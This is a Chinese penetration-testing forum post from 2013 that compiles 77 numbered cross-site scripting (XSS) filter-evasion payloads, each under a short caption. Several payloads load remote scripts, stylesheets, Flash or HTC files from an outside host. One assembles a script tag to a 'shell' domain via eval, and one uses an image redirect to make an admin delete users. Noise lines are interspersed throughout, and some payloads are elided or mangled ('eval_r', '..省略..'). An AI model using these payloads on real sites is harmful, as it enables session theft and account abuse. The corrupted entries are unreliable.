中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. C6 S: {7 c4 X9 p p" ~
(1)普通的XSS JavaScript注入
/ a# k" [+ D8 |4 m1 n6 {* k/ Y3 R- i3 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* ?) x- o4 O& S6 S# {" I
(2)IMG标签XSS使用JavaScript命令
( N% |8 S# f* c0 w o7 Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 T4 r. S% c) m+ y- F, d
(3)IMG标签无分号无引号
6 W9 y) e9 ]3 T) Y) F
<IMG SRC=javascript:alert(‘XSS’)>
& t6 n# w0 W; G. R2 |+ `
(4)IMG标签大小写不敏感
) }# Q- y" R4 G+ p
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 V3 G- D( Y$ g1 X+ f
(5)HTML编码(必须有分号)
) ~8 y" X+ p: u; U
<IMG SRC=javascript:alert(“XSS”)>
0 v' K" L& I% K$ ~- ?: l3 G/ E. }
(6)修正缺陷IMG标签
' p2 K2 V! x0 Z% C& b
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- ^4 \& y9 X% F# T7 D" `
( I0 L+ A7 t# l; e3 Z# ]8 L
& P$ Y& N ~* ]( S H+ z
(7)formCharCode标签(计算器)
]4 s& B; R: g1 B
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+ d! z# W% v* _. j' B1 L1 ?
(8)UTF-8的Unicode编码(计算器)
+ d4 P# d* E' M' W* q% ]% d" O
<IMG SRC=jav..省略..S')>
8 p; H v; h4 ?; V5 A
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
2 i9 p* |' Y# A4 T: r. w( m
<IMG SRC=jav..省略..S')>
8 ^& h9 c) @' j0 V- W7 x* l: N
(10)十六进制编码也是没有分号(计算器)
; ]3 j3 d7 S/ J v2 K$ G$ D
<IMG SRC=java..省略..XSS')>
9 e# @7 |" W7 U" p
(11)嵌入式标签,将Javascript分开
@1 Y( t& {9 _. n5 m9 I
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- ^6 f: ? i7 J+ Q7 Z& o' u! n/ ]
(12)嵌入式编码标签,将Javascript分开
# A7 m: F! O8 }3 `
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; c7 g0 V/ P. g( V, G
(13)嵌入式换行符
7 Y& }9 v. e3 Z( {3 }2 n+ |
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 c; r2 _" y% e$ W) E- N- n3 q
(14)嵌入式回车
: _ N" z8 p1 _" k: K7 w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
2 I5 V4 u2 h* Q4 {
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 X3 h/ M1 z, e& s6 n4 {& I; ]
<IMG SRC=”javascript:alert(‘XSS‘)”>
! z; E- M2 [9 D5 o
(16)解决限制字符(要求同页面)
8 C, \' b* q) f6 p
<script>z=’document.’</script>
0 e* W+ L! Y ^7 X! Y
<script>z=z+’write(“‘</script>
' U6 u0 h0 V+ S$ {: D3 H5 k4 I
<script>z=z+’<script’</script>
: u$ m: p: N9 X/ N* T& t7 M
<script>z=z+’ src=ht’</script>
, \/ j+ Y1 Z0 q% \7 e
<script>z=z+’tp://ww’</script>
8 u1 C2 z% @: g& W6 ]
<script>z=z+’w.shell’</script>
9 k6 Q% T) l D+ ?3 y4 r% h4 v, o/ e
<script>z=z+’.net/1.’</script>
9 f( x. H/ q6 L' o1 r7 P- I
<script>z=z+’js></sc’</script>
' }; t! }2 f& @
<script>z=z+’ript>”)’</script>
) x6 ]8 H) p# @+ a6 J( Q
<script>eval_r(z)</script>
7 G7 H$ O9 Q6 C. L! X' A
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
5 p! \( b* s' a/ V4 A# V/ C& K
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
! Y, m( S! q) c
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
% B" Z6 l9 w, Q" v- v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ i9 C3 A: U1 J
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( Z% ]( T- r) a Q4 @; W% }
(19)Spaces和meta前的IMG标签
& k$ z, F5 { w+ F7 f
<IMG SRC=” javascript:alert(‘XSS’);”>
6 q, y" h/ F: Y5 x
(20)Non-alpha-non-digit XSS
$ D/ g; h2 c8 f/ e9 n" D
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
" g6 d& ?4 K5 R& W7 H( n: y
(21)Non-alpha-non-digit XSS to 2
5 Y- d# F" \/ A
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ ?# K3 h6 S! Q: D) R' o
(22)Non-alpha-non-digit XSS to 3
2 g; [' {# z A. l4 Y
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
! L! q& {: \3 A
(23)双开括号
/ ^2 z" j8 G% B; `% Z; q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# S/ m* U l/ R5 h8 S6 |
(24)无结束脚本标记(仅火狐等浏览器)
0 U- C; m4 ^, f: W0 y
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# Q4 \: w" i9 H& B/ H9 Y1 l
(25)无结束脚本标记2
( L4 {# s9 O5 |! J
<SCRIPT SRC=//3w.org/XSS/xss.js>
5 Q1 n+ ?1 O) m
(26)半开的HTML/JavaScript XSS
# B+ W8 O5 H$ D; O7 q' t' X% H
<IMG SRC=”javascript:alert(‘XSS’)”
% x8 P$ j/ }6 \5 p4 T8 _) o$ N) I6 k
(27)双开角括号
) \! Q6 W- i9 M& l6 Y
<iframe src=http://3w.org/XSS.html <
6 n7 t2 n9 F; a+ s2 S8 C: W# \
(28)无单引号 双引号 分号
N+ J' @6 l/ G r* O1 M
<SCRIPT>a=/XSS/
& f4 p' N2 [$ H' X$ w0 ^, \
alert(a.source)</SCRIPT>
# j" l3 d# H0 C5 \. t' h/ r
(29)换码过滤的JavaScript
' y Q1 B0 l. p
\”;alert(‘XSS’);//
- g8 ^: Z6 m4 k* D" [% l
(30)结束Title标签
) w7 P! t2 P. l3 s/ a, a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
. o' t8 E$ j/ f9 W& \
(31)Input Image
! a W1 R4 N7 g4 b( i' ^
<INPUT SRC=”javascript:alert(‘XSS’);”>
# m+ t" u1 {! x
(32)BODY Image
+ j! S/ u- q& q$ A1 \% C
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# G- E4 l# G& t) S& j2 ]
(33)BODY标签
3 z. @, s6 ]* X
<BODY(‘XSS’)>
3 ]) f7 V5 M5 T2 C3 N# Y" m
(34)IMG Dynsrc
. \9 }. i. N; [5 Z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
# _! r% u5 r) P$ o' H+ R
(35)IMG Lowsrc
6 ^" w, g# S. u6 u
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
( {( l" G; J6 P7 T6 X, l
(36)BGSOUND
# ^9 ~ [9 N; c/ M' d" u
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ y' O3 M5 {* ~
(37)STYLE sheet
* O/ ~/ Z& q; D' h
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& _$ `% ^( I" n8 z) c
(38)远程样式表
3 [& }% M" s \
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
9 s7 x; }0 o! J/ F8 d8 ]
(39)List-style-image(列表式)
' O+ e2 @1 ~3 Q
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! ?! W' s4 y9 l7 [2 v! d( d
(40)IMG VBscript
; u6 [6 @4 Z4 G0 d
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
" y. F& x2 I& W% F4 V. h. p
(41)META链接url
- L( Q, c) y u F0 `
8 I; j3 ^" b1 z! @- P; v6 m0 U
% T O# L- B1 w5 v% i
<META HTTP-EQUIV=”refresh” CONTENT=”0;
' u8 `! Y; e" v n
URL=http://;URL=javascript:alert(‘XSS’);”>
5 b- u$ Y2 i: |* q c! Y+ Q3 O* A* v
(42)Iframe
8 x _6 x4 G' o1 X7 K
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
: d+ h e1 T0 H+ ?
(43)Frame
8 Z8 _7 O3 ?$ Y, L n- m
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
! G0 ~+ K0 J4 W5 r0 c
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
6 u7 o4 @, Z s! X5 x1 Y9 ~
(44)Table
. Q6 h: B6 q$ Y- |9 k5 Z3 h2 k; z
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% \& u# o3 M, K& T# L
(45)TD
) v8 u* Y- y( U; z" B, F* X
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# i( ~. Y! } d. H
(46)DIV background-image
3 U1 A. `8 k- J% q9 @
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& h+ v" [( b% G: u) d9 g& v: V
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 p% D+ ]0 @* L9 x+ _* K
8&13&12288&65279)
2 {6 V. n0 |9 H: L) y' p# C, j
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
# J; `8 M, |+ C" r5 A
(48)DIV expression
( U2 z( d! y; g7 J9 n9 y1 O# l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# p4 c) R6 j. I4 F
(49)STYLE属性分拆表达
4 T+ m0 M& q% \
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
* R7 n3 C5 `4 }% _% p2 w
(50)匿名STYLE(组成:开角号和一个字母开头)
5 P" K9 e5 ~; i7 i
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 T4 [) _2 Y5 p$ L* e9 h
(51)STYLE background-image
" g* T* \0 |& U. W4 I
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
T R) j, g6 p: {. |8 A
CLASS=XSS></A>
& B# `' }8 A; e" Q, Z
(52)IMG STYLE方式
2 ^& ^5 g# s* n8 y, a( B
exppression(alert(“XSS”))’>
+ N+ d! w( S+ V u9 |
(53)STYLE background
# n& Q7 ^: N+ W' _
<STYLE><STYLE
0 ?8 c; ?6 q9 P* s) v- y
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
W$ f' d* U2 c
(54)BASE
0 y" R5 ]; N" l+ Q w
<BASE HREF=”javascript:alert(‘XSS’);//”>
* }4 s; a3 W$ q% s! C
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
H2 y% \7 ]9 |7 g; D8 E: f
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
( D* J$ C- c1 m* z/ C+ q: q( R4 z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
' T' J; N# C5 a ^. a6 [
a=”get”;
3 W/ y; @, I. h3 g/ A- O* ~
b=”URL(\”";
8 d3 @ d& ?( E9 O( I
c=”javascript:”;
. M+ K5 a t$ L i
d=”alert(‘XSS’);\”)”;
' H8 F9 \/ I' [, w+ I& X
eval_r(a+b+c+d);
* s- `- a4 C! S7 A7 q9 ~/ o! @
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 l$ j8 U2 F' Y3 }) g6 X
<HTML xmlns:xss>
9 |( U2 ]& \+ c% P
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
& O1 x$ `4 c/ L# i) y6 Q
<xss:xss>XSS</xss:xss>
' s8 @( y |! c b
</HTML>
" C3 ?4 G0 c! h) a6 ?) h
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
/ {2 R2 f+ B0 ?; p8 i
<SCRIPT SRC=””></SCRIPT>
2 s. O. i) D" {/ i7 ~ @ [
(59)IMG嵌入式命令,可执行任意命令
9 i! e0 t) c' U8 V+ L n5 C+ E [
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
4 }8 W2 E5 D8 {: H& O
(60)IMG嵌入式命令(a.jpg在同服务器)
$ _" ]$ ~$ X; I! l3 d9 u5 i
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
* ?" U5 R6 c, _- K/ O7 U
(61)绕符号过滤
- x$ L( L1 E5 f+ [3 {6 O
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
1 |& ?. H% N: ]$ M
(62)
9 ?1 l3 B) o% b/ S* I8 U
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
5 I6 L$ L* F5 j4 Y: s. d
(63)
, k3 ]) K) ?8 p5 t- M! C+ T
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
5 m& B# [2 N8 _; O
(64)
# ?5 F8 C+ f" T0 r2 A
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
7 c c$ V4 u6 e9 q
(65)
& z$ I5 t8 v/ x: E' D+ i. N
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
. G( L' u; T- E) u/ i8 |* w4 \4 y8 [
(66)12-7-1 T00LS - Powered by Discuz! Board
5 D" Y- N) j) G& V7 J4 F b
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
7 L/ D1 l$ y3 D- B
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
& i2 z7 r5 A; I9 B- X. t
(67)
% Q# E2 E$ v l% o( I) d
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
. x7 g2 E1 J9 u4 R
</SCRIPT>
- V* P4 }2 y4 [/ {) x3 h
(68)URL绕行
- Y) U y. ~; B4 x) F* {' C
<A HREF=”
http://127.0.0.1/
”>XSS</A>
7 G/ r! J; T* x" T4 V1 U. Z. t
(69)URL编码
+ @* H3 W7 |7 N0 Y5 n
<A HREF=”
http://3w.org
”>XSS</A>
! k* n4 C3 E, \) n% }/ f
(70)IP十进制
: F7 S. i; J9 x
<A HREF=”http://3232235521″>XSS</A>
# l8 q4 P! e% @, G5 {
(71)IP十六进制
* J6 ~" q9 b# y% y3 b2 l
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
; [- A T! S+ G# J
(72)IP八进制
3 H" h0 A/ K8 k; A% Y* l
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
/ q4 Z C; V4 @, O" b0 A
(73)混合编码
1 U# n3 o* D0 Z2 a! u& }4 x' L7 D
<A HREF=”h
$ n! i3 M( Y0 u
tt p://6 6.000146.0×7.147/”">XSS</A>
7 q( N1 T& ]4 Z/ i& K
(74)节省[http:]
8 J& r( ?$ H, m% I7 l( N2 K& R* Z
<A HREF=”//www.google.com/”>XSS</A>
4 u" g$ q$ r. B v9 J
(75)节省[www]
# C0 F4 u7 k: p8 ~1 b
<A HREF=”
http://google.com/
”>XSS</A>
* O4 \, R7 }# W8 Q
(76)绝对点绝对DNS
) Z7 E; W+ ~% \* F/ H
<A HREF=”
http://www.google.com./
”>XSS</A>
8 f7 M+ g6 X5 e3 R
(77)javascript链接
; o# I$ f& p) R# v- J( m
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
; G8 z& z$ F7 ~+ x K! [) u7 x
4 c7 I! \3 a Y9 q0 y. V1 H
原文地址:
http://fuzzexp.org/u/0day/?p=14
- X0 V! p5 ?9 X/ i% L
9 M, S2 F E2 d
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2